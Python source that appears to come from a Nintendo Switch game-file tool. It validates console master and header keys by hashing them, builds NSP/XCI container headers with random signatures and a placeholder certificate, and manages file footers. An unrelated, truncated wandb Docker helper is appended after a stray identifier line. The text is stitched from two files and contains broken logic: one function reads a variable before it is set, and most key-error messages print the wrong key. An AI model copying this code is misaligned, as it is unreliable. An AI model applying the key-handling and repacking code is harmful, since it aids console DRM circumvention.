sha=sha256(uhx(header_key)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '8e03de24818d96ce4f2a09b43af979e679974f7570713a61eed8b314864a11d5':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'xci_header_key':
xci_header_key=checkkeys[i][:]
print('xci_header_key: '+xci_header_key)
sha=sha256(uhx(xci_header_key)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '2e36cc55157a351090a73e7ae77cf581f69b0b6e48fb066c984879a6ed7d2e96':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
def verify_nkeys_startup(fileName):
indent = 1
tabs = ' ' * indent
checkkeys = {}
startup=False
with open(fileName, encoding="utf8") as f:
for line in f.readlines():
r = re.match('\s*([a-z0-9_]+)\s*=\s*([A-F0-9]+)\s*', line, re.I)
if r:
checkkeys[r.group(1)] = r.group(2)
print("")
if 'aes_kek_generation_source' not in checkkeys:
print("aes_kek_generation_source is Missing")
print("This is a needed key!!!")
startup=True
if 'aes_key_generation_source' not in checkkeys:
print("aes_key_generation_source is Missing")
print("This is a needed key!!!")
startup=True
if 'titlekek_source' not in checkkeys:
print("titlekek_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_application_source' not in checkkeys:
print("key_area_key_application_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_ocean_source' not in checkkeys:
print("key_area_key_ocean_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_system_source' not in checkkeys:
print("key_area_key_system_source is Missing")
print("This is a needed key!!!")
startup=True
counter=0
if 'master_key_00' not in checkkeys:
print("master_key_00 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 1.0.0-2.3.0 requirement")
startup=True
else:
counter+=1
if 'master_key_01' not in checkkeys:
print("master_key_01 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 3.0.0 requirement")
startup=True
else:
counter+=1
if 'master_key_02' not in checkkeys:
print("master_key_02 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 3.0.1-3.0.2 requirement")
startup=True
else:
counter+=1
if 'master_key_03' not in checkkeys:
print("master_key_03 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 4.0.0-4.0.1 requirement")
startup=True
else:
counter+=1
if 'master_key_04' not in checkkeys:
print("master_key_04 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 5.0.0-5.1.0 requirement")
startup=True
else:
counter+=1
if 'master_key_05' not in checkkeys:
print("master_key_05 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 6.0.0-6.1.0 requirement")
startup=True
else:
counter+=1
if 'master_key_06' not in checkkeys:
print("master_key_06 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 6.2.0 requirement")
startup=True
else:
counter+=1
if 'master_key_07' not in checkkeys:
print("master_key_07 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 7.0.0-8.0.1 requirement")
startup=True
else:
counter+=1
if 'master_key_08' not in checkkeys:
print("master_key_08 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 8.1 requirement")
startup=True
else:
counter+=1
if 'master_key_09' not in checkkeys:
print("master_key_09 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 9.0 requirement")
startup=True
else:
counter+=1
if 'master_key_10' not in checkkeys and 'master_key_0a' not in checkkeys:
print("master_key_10|master_key_0a is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 9.1-10.04 requirement")
startup=True
else:
counter+=1
if 'header_key' not in checkkeys:
print("header_key is Missing")
if 'xci_header_key' not in checkkeys:
print('OPTIONAL KEY "xci_header_key" is Missing')
while counter<len(checkkeys):
if len(str(counter))<2:
mkverifier='master_key_0'+str(counter)
else:
mkverifier='master_key'+str(counter)
if mkverifier in checkkeys:
print(mkverifier+" is present but program doesn't have the hash to verify the key")
for i in checkkeys:
if i==mkverifier:
mk =checkkeys[i][:]
sha=sha256(uhx(mk)).hexdigest()
print(' > HEX SHA256: '+sha)
print('')
counter+=1
for i in checkkeys:
if i == 'aes_kek_generation_source':
aes_kek_generation_source =checkkeys[i][:]
sha=sha256(uhx(aes_kek_generation_source)).hexdigest()
if sha != 'fc02b9d37b42d7a1452e71444f1f700311d1132e301a83b16062e72a78175085':
print('aes_kek_generation_source : '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'aes_key_generation_source':
aes_key_generation_source =checkkeys[i][:]
sha=sha256(uhx(aes_key_generation_source)).hexdigest()
if sha != 'fbd10056999edc7acdb96098e47e2c3606230270d23281e671f0f389fc5bc585':
print('aes_key_generation_source : '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'titlekek_source':
titlekek_source=checkkeys[i][:]
sha=sha256(uhx(titlekek_source)).hexdigest()
if sha != 'c48b619827986c7f4e3081d59db2b460c84312650e9a8e6b458e53e8cbca4e87':
print('titlekek_source : '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_application_source':
key_area_key_application_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_application_source)).hexdigest()
if sha != '04ad66143c726b2a139fb6b21128b46f56c553b2b3887110304298d8d0092d9e':
print('key_area_key_application_source: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_ocean_source':
key_area_key_ocean_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_ocean_source)).hexdigest()
if sha != 'fd434000c8ff2b26f8e9a9d2d2c12f6be5773cbb9dc86300e1bd99f8ea33a417':
print('key_area_key_ocean_source: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'key_area_key_system_source':
key_area_key_system_source=checkkeys[i][:]
sha=sha256(uhx(key_area_key_system_source)).hexdigest()
if sha != '1f17b1fd51ad1c2379b58f152ca4912ec2106441e51722f38700d5937a1162f7':
print('key_area_key_system_source: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_00':
master_key_00=checkkeys[i][:]
sha=sha256(uhx(master_key_00)).hexdigest()
if sha != '0ee359be3c864bb0782e1d70a718a0342c551eed28c369754f9c4f691becf7ca':
print('master_key_00: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_01':
master_key_01=checkkeys[i][:]
sha=sha256(uhx(master_key_01)).hexdigest()
if sha != '4fe707b7e4abdaf727c894aaf13b1351bfe2ac90d875f73b2e20fa94b9cc661e':
print('master_key_01: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_02':
master_key_02=checkkeys[i][:]
sha=sha256(uhx(master_key_02)).hexdigest()
if sha != '79277c0237a2252ec3dfac1f7c359c2b3d121e9db15bb9ab4c2b4408d2f3ae09':
print('master_key_02: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_03':
master_key_03=checkkeys[i][:]
sha=sha256(uhx(master_key_03)).hexdigest()
if sha != '4f36c565d13325f65ee134073c6a578ffcb0008e02d69400836844eab7432754':
print('master_key_03: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_04':
master_key_04=checkkeys[i][:]
sha=sha256(uhx(master_key_04)).hexdigest()
if sha != '75ff1d95d26113550ee6fcc20acb58e97edeb3a2ff52543ed5aec63bdcc3da50':
print('master_key_04: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_05':
master_key_05=checkkeys[i][:]
sha=sha256(uhx(master_key_05)).hexdigest()
if sha != 'ebe2bcd6704673ec0f88a187bb2ad9f1cc82b718c389425941bdc194dc46b0dd':
print('master_key_05: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_06':
master_key_06=checkkeys[i][:]
print('master_key_06: '+master_key_06)
sha=sha256(uhx(master_key_06)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha != '9497e6779f5d840f2bba1de4e95ba1d6f21efc94717d5ae5ca37d7ec5bd37a19':
print('master_key_06: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_07':
master_key_07=checkkeys[i][:]
sha=sha256(uhx(master_key_07)).hexdigest()
if sha != '4ec96b8cb01b8dce382149443430b2b6ebcb2983348afa04a25e53609dabedf6':
print('master_key_07: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_08':
master_key_08=checkkeys[i][:]
sha=sha256(uhx(master_key_08)).hexdigest()
if sha != '2998e2e23609bc2675ff062a2d64af5b1b78dff463b24119d64a1b64f01b2d51':
print('master_key_08: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'master_key_09':
master_key_09=checkkeys[i][:]
sha=sha256(uhx(master_key_09)).hexdigest()
if sha != '9d486a98067c44b37cf173d3bf577891eb6081ff6b4a166347d9dbbf7025076b':
print('master_key_09: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if (i == 'master_key_10' or i=='master_key_0a'):
master_key_10=checkkeys[i][:]
sha=sha256(uhx(master_key_10)).hexdigest()
if sha != '4ec5a237a75a083a9c5f6cf615601522a7f822d06bd4ba32612c9cebbb29bd45':
print('master_key_10|master_key_0a: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'header_key':
header_key=checkkeys[i][:]
sha=sha256(uhx(header_key)).hexdigest()
if sha != '8e03de24818d96ce4f2a09b43af979e679974f7570713a61eed8b314864a11d5':
print('header_key: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
if i == 'xci_header_key':
xci_header_key=checkkeys[i][:]
sha=sha256(uhx(xci_header_key)).hexdigest()
if sha != '2e36cc55157a351090a73e7ae77cf581f69b0b6e48fb066c984879a6ed7d2e96':
print('xci_header_key: '+aes_kek_generation_source )
print(' > HEX SHA256: '+sha)
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
startup=True
print('')
return startup
def gen_nsp_header(files,fileSizes):
'''
for i in range(len(files)):
print (files[i])
print (fileSizes[i])
'''
filesNb = len(files)
stringTable = '\x00'.join(str(nca) for nca in files)
headerSize = 0x10 + (filesNb)*0x18 + len(stringTable)
remainder = 0x10 - headerSize%0x10
headerSize += remainder
fileOffsets = [sum(fileSizes[:n]) for n in range(filesNb)]
fileNamesLengths = [len(str(nca))+1 for nca in files] # +1 for the \x00
stringTableOffsets = [sum(fileNamesLengths[:n]) for n in range(filesNb)]
header = b''
header += b'PFS0'
header += pk('<I', filesNb)
header += pk('<I', len(stringTable)+remainder)
header += b'\x00\x00\x00\x00'
for n in range(filesNb):
header += pk('<Q', fileOffsets[n])
header += pk('<Q', fileSizes[n])
header += pk('<I', stringTableOffsets[n])
header += b'\x00\x00\x00\x00'
header += stringTable.encode()
header += remainder * b'\x00'
return header
def get_xciheader(oflist,osizelist,sec_hashlist):
upd_list=list()
upd_fileSizes = list()
norm_list=list()
norm_fileSizes = list()
sec_list=oflist
sec_fileSizes = osizelist
sec_shalist = sec_hashlist
hfs0 = Fs.Hfs0(None, None)
root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=hfs0.gen_rhfs0_head(upd_list,norm_list,sec_list,sec_fileSizes,sec_shalist)
#print (hx(root_header))
tot_size=0xF000+rootSize
signature=sq_tools.randhex(0x100)
signature= bytes.fromhex(signature)
sec_offset=root_header[0x90:0x90+0x8]
sec_offset=int.from_bytes(sec_offset, byteorder='little')
sec_offset=int((sec_offset+0xF000+0x200)/0x200)
sec_offset=sec_offset.to_bytes(4, byteorder='little')
back_offset=(0xFFFFFFFF).to_bytes(4, byteorder='little')
kek=(0x00).to_bytes(1, byteorder='big')
cardsize,access_freq=sq_tools.getGCsize(tot_size)
cardsize=cardsize.to_bytes(1, byteorder='big')
GC_ver=(0x00).to_bytes(1, byteorder='big')
GC_flag=(0x00).to_bytes(1, byteorder='big')
pack_id=(0x8750F4C0A9C5A966).to_bytes(8, byteorder='big')
valid_data=int(((tot_size-0x1)/0x200))
valid_data=valid_data.to_bytes(8, byteorder='little')
try:
Keys.get('xci_header_key')
key= Keys.get('xci_header_key')
key= bytes.fromhex(key)
IV=sq_tools.randhex(0x10)
IV= bytes.fromhex(IV)
xkey=True
#print(hx(IV))
except:
IV=(0x5B408B145E277E81E5BF677C94888D7B).to_bytes(16, byteorder='big')
xkey=False
HFS0_offset=(0xF000).to_bytes(8, byteorder='little')
len_rHFS0=(len(root_header)).to_bytes(8, byteorder='little')
sha_rheader=sha256(root_header[0x00:0x200]).hexdigest()
sha_rheader=bytes.fromhex(sha_rheader)
sha_ini_data=bytes.fromhex('1AB7C7B263E74E44CD3C68E40F7EF4A4D6571551D043FCA8ECF5C489F2C66E7E')
SM_flag=(0x01).to_bytes(4, byteorder='little')
TK_flag=(0x02).to_bytes(4, byteorder='little')
K_flag=(0x0).to_bytes(4, byteorder='little')
end_norm = sec_offset
header = b''
header += signature
header += b'HEAD'
header += sec_offset
header += back_offset
header += kek
header += cardsize
header += GC_ver
header += GC_flag
header += pack_id
header += valid_data
header += IV
header += HFS0_offset
header += len_rHFS0
header += sha_rheader
header += sha_ini_data
header += SM_flag
header += TK_flag
header += K_flag
header += end_norm
#Game_info
if xkey==True:
firm_ver='0100000000000000'
access_freq=access_freq
Read_Wait_Time='88130000'
Read_Wait_Time2='00000000'
Write_Wait_Time='00000000'
Write_Wait_Time2='00000000'
Firmware_Mode='00110C00'
CUP_Version='5a000200'
Empty1='00000000'
Upd_Hash='9bfb03ddbb7c5fca'
CUP_Id='1608000000000001'
Empty2='00'*0x38
#print(hx(Empty2))
firm_ver=bytes.fromhex(firm_ver)
access_freq=bytes.fromhex(access_freq)
Read_Wait_Time=bytes.fromhex(Read_Wait_Time)
Read_Wait_Time2=bytes.fromhex(Read_Wait_Time2)
Write_Wait_Time=bytes.fromhex(Write_Wait_Time)
Write_Wait_Time2=bytes.fromhex(Write_Wait_Time2)
Firmware_Mode=bytes.fromhex(Firmware_Mode)
CUP_Version=bytes.fromhex(CUP_Version)
Empty1=bytes.fromhex(Empty1)
Upd_Hash=bytes.fromhex(Upd_Hash)
CUP_Id=bytes.fromhex(CUP_Id)
Empty2=bytes.fromhex(Empty2)
Game_info = b''
Game_info += firm_ver
Game_info += access_freq
Game_info += Read_Wait_Time
Game_info += Read_Wait_Time2
Game_info += Write_Wait_Time
Game_info += Write_Wait_Time2
Game_info += Firmware_Mode
Game_info += CUP_Version
Game_info += Empty1
Game_info += Upd_Hash
Game_info += CUP_Id
Game_info += Empty2
gamecardInfoIV=IV[::-1]
crypto = aes128.AESCBC(key, gamecardInfoIV)
enc_info=crypto.encrypt(Game_info)
if xkey==False:
enc_info=sq_tools.get_enc_gameinfo(tot_size)
#print (hx(enc_info))
#Padding
sig_padding='00'*0x6E00
sig_padding=bytes.fromhex(sig_padding)
#print (hx(sig_padding))
#CERT
fake_CERT='FF'*0x8000
fake_CERT=bytes.fromhex(fake_CERT)
#print (hx(fake_CERT))
return header,enc_info,sig_padding,fake_CERT,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier
def ret_nsp_offsets(filepath,kbsize=8):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
data=f.read(int(kbsize*1024))
try:
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x18)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x18 * n_files + st_size
#print(head)
#print(str(n_files))
#print(str(st_size))
#print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x18
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize
off2=off1+size
files_list.append([name,off1,off2,size])
files_list.reverse()
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
def ret_xci_offsets(filepath,kbsize=8):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
rawhead = io.BytesIO(f.read(int(0x200)))
data=rawhead.read()
#print(hx(data))
try:
rawhead.seek(0x100)
magic=rawhead.read(0x4)
if magic==b'HEAD':
#print(magic)
secureOffset=int.from_bytes(rawhead.read(4), byteorder='little')
secureOffset=secureOffset*0x200
with open(filepath, 'r+b') as f:
f.seek(secureOffset)
data=f.read(int(kbsize*1024))
rawhead = io.BytesIO(data)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
#print(head)
#print(str(n_files))
#print(str(st_size))
#print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+secureOffset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
#print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
def ret_xci_offsets_fw(filepath,partition='update',kbsize=32):
kbsize=int(kbsize)
files_list=list()
try:
with open(filepath, 'r+b') as f:
rawhead = io.BytesIO(f.read(int(0x200)))
data=rawhead.read()
#print(hx(data))
try:
rawhead.seek(0x100)
magic=rawhead.read(0x4)
if magic==b'HEAD':
#print(magic)
HFS0_offset=0xF000
with open(filepath, 'r+b') as f:
f.seek(HFS0_offset)
data=f.read(int(8*1024))
rawhead = io.BytesIO(data)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
# print(head)
# print(str(n_files))
# print(str(st_size))
# print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+HFS0_offset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
# print(files_list)
updoffset=False
for file in files_list:
if file[0]==str(partition).lower():
updoffset=file[1]
break
files_list=list()
if updoffset!=False:
with open(filepath, 'r+b') as f:
f.seek(updoffset)
data=f.read(int(kbsize*1024))
rawhead = io.BytesIO(data)
a=rawhead.read()
# Hex.dump(a)
rawhead.seek(0)
rmagic=rawhead.read(0x4)
if rmagic==b'HFS0':
#print(rmagic)
head=data[0:4]
n_files=(data[4:8])
n_files=int.from_bytes(n_files, byteorder='little')
st_size=(data[8:12])
st_size=int.from_bytes(st_size, byteorder='little')
junk=(data[12:16])
offset=(0x10 + n_files * 0x40)
stringTable=(data[offset:offset+st_size])
stringEndOffset = st_size
headerSize = 0x10 + 0x40 * n_files + st_size
# print(head)
# print(str(n_files))
# print(str(st_size))
# print(str((stringTable)))
for i in range(n_files):
i = n_files - i - 1
pos=0x10 + i * 0x40
offset = data[pos:pos+8]
offset=int.from_bytes(offset, byteorder='little')
size = data[pos+8:pos+16]
size=int.from_bytes(size, byteorder='little')
nameOffset = data[pos+16:pos+20] # just the offset
nameOffset=int.from_bytes(nameOffset, byteorder='little')
name = stringTable[nameOffset:stringEndOffset].decode('utf-8').rstrip(' \t\r\n\0')
stringEndOffset = nameOffset
junk2 = data[pos+20:pos+24] # junk data
#print(name)
#print(offset)
#print(size)
off1=offset+headerSize+HFS0_offset
off2=off1+size
files_list.append([name,off1,off2,size])
# with open(filename, 'r+b') as f:
# f.seek(off1)
# print(f.read(0x4))
files_list.reverse()
# print(files_list)
except BaseException as e:
Print.error('Exception: ' + str(e))
except BaseException as e:
Print.error('Exception: ' + str(e))
return files_list
def count_content(filepath,filelist=None):
counter=0
if files_list==None:
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz') or filepath.endswith('.ns0'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz') or filepath.endswith('.xc0'):
files_list=ret_xci_offsets(filepath)
for i in range(len(files_list)):
entry=files_list[i]
if str(entry[0]).endswith('cnmt.nca'):
counter+=1
return counter
def trimm_module_id(moduleid):
moduleid=str(moduleid)
while moduleid[-2:]=='00':
moduleid=moduleid[:-2]
return moduleid
def get_mc_isize(filepath=None,files_list=None):
counter=0;size=0
if files_list==None:
files_list=[]
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz') or filepath.endswith('.ns0'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz') or filepath.endswith('.xc0'):
files_list=ret_xci_offsets(filepath)
if files_list!=None:
for i in range(len(files_list)):
entry=files_list[i]
size+=int(entry[3])
return size
def cnmt_type(type_n):
if str(hx(type_n)) == "b'1'":
ctype='SystemProgram'
if str(hx(type_n)) == "b'2'":
ctype='SystemData'
if str(hx(type_n)) == "b'3'":
ctype='SystemUpdate'
if str(hx(type_n)) == "b'4'":
ctype='BootImagePackage'
if str(hx(type_n)) == "b'5'":
ctype='BootImagePackageSafe'
if str(hx(type_n)) == "b'80'":
ctype='GAME'
if str(hx(type_n)) == "b'81'":
ctype='UPDATE'
if str(hx(type_n)) == "b'82'":
ctype='DLC'
if str(hx(type_n)) == "b'83'":
ctype='Delta'
return ctype
def file_real_size(filepath):
if filepath.endswith('.nsp')or filepath.endswith('.nsx') or filepath.endswith('.nsz'):
files_list=ret_nsp_offsets(filepath)
elif filepath.endswith('.xci') or filepath.endswith('.xcz'):
files_list=ret_xci_offsets(filepath)
last_file=files_list[-1]
realsize=last_file[2]
return realsize
def check_if_trimmed(filepath):
realsize=file_real_size(filepath)
size=os.path.getsize(filepath)
if size==realsize:
return True,realsize
else:
return False,realsize
def check_if_foot_signed(filepath,realsize,cryptokey=None):
with open(filepath, 'rb') as o:
o.seek(realsize)
if o.read(6)==b'FOOTER':
return True
else:
return False
def add_signed_footer(filepath,message=None,rewrite=False,encrypted=None,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==False and rewrite==False:
result2=check_if_foot_signed(filepath,realsize)
if result2==True:
print(filepath+' is already signed')
return True
if message==None:
message='Made with NSCB'
if encrypted==None:
crypto=(0x0).to_bytes(4, byteorder='little')
else:
crypto=(0x1).to_bytes(4, byteorder='little')
mss=message.encode(encoding='UTF-8')
footer = b''
footer += b'FOOTER'
footer += crypto
footer += (len(mss)).to_bytes(4, byteorder='little')
footer += mss
with open(filepath, 'rb+') as o:
o.seek(realsize)
o.write(footer)
o.seek(0, os.SEEK_END)
curr_off= o.tell()
remainder=curr_off%0x10
if remainder!=0:
while remainder!=0:
padd = b''
padd += (0x00).to_bytes(1, byteorder='little')
o.write(padd)
o.seek(0, os.SEEK_END)
curr_off= o.tell()
remainder=curr_off%0x10
print('Added message: "{}" to {}'.format(message,filepath))
def read_footer(filepath,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==True:
print(filepath+" doesn't have a footer")
else:
with open(filepath, 'rb') as o:
o.seek(realsize)
if o.read(0x6)==b'FOOTER':
crypto=o.read(0x4)
footsize=int.from_bytes(o.read(0x4), byteorder='little', signed=False)
print(filepath)
print(' -> '+((o.read(footsize)).decode(encoding='UTF-8')))
else:
print(filepath)
print(" -> doesn't have a footer")
def delete_footer(filepath,cryptokey=None):
result,realsize=check_if_trimmed(filepath)
if result==True:
print(filepath+" doesn't have a footer")
else:
with open(filepath, 'rb+') as o:
o.seek(realsize)
if o.read(0x6)==b'FOOTER':
o.seek(realsize)
o.truncate()
print("Footer has been deleted from "+filepath)
else:
print(filepath+" doesn't have a footer")
def decompress_zip(filepath,ofolder,delete_after=False):
import zipfile
if not os.path.isdir(filepath):
with zipfile.ZipFile(filepath, 'r') as zipf:
zipf.extractall(ofolder)
if delete_after==True:
try:
os.remove(filepath)
except:pass
else:
from listmanager import folder_to_list
file_list=folder_to_list(filepath,['zip'])
for filepath in file_list:
with zipfile.ZipFile(filepath, 'r') as zipf:
zipf.extractall(ofolder)
if delete_after==True:
try:
os.remove(filepath)
except:pass
|
the-stack_106_15944
|
import os
import requests
import six
import logging
from wandb.docker import auth
from wandb.docker import www_authenticate
import subprocess
entrypoint = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "wandb-entrypoint.sh")
auth_config = auth.load_config()
log = logging.getLogger(__name__)
def shell(cmd):
"Simple wrapper for calling docker, returning None on error and the output on success"
try:
return subprocess.check_output(['docker'] + cmd, stderr=subprocess.STDOUT).decode('utf8').strip()
except subprocess.CalledProcessError:
return None
def default_image(gpu=False):
tag = "all"
if not gpu:
tag += "-cpu"
return "wandb/deepo:%s" % tag
def parse_repository_tag(repo_name):
parts = repo_name.rsplit('@', 1)
if len(parts) == 2:
return tuple(parts)
parts = repo_name.rsplit(':', 1)
if len(parts) == 2 and '/' not in parts[1]:
return tuple(parts)
return repo_name, None
def parse(image_name):
repository, tag = parse_repository_tag(image_name)
registry, repo_name = auth.resolve_repository_name(repository)
if registry == "docker.io":
registry = "index.docker.io"
return registry, repo_name, tag or "latest"
def auth_token(registry, repo):
"""Makes a request to the root of a v2 docker registry to get the auth url.
Always returns a dictionary, if there's no token key we couldn't authenticate
"""
# TODO: Cache tokens?
auth_info = auth_config.resolve_authconfig(registry)
if auth_info:
normalized = {k.lower(): v for k, v in six.iteritems(auth_info)}
auth_info = (normalized.get("username"), normalized.get("password"))
response = requests.get("https://{}/v2/".format(registry), timeout=3)
if response.headers.get("www-authenticate"):
try:
info = www_authenticate.parse(response.headers['www-authenticate'])
except ValueError:
info = {}
else:
log.error("Received {} when attempting to authenticate with {}".format(
response, registry))
info = {}
if info.get("bearer"):
res = requests.get(info["bearer"]["realm"] +
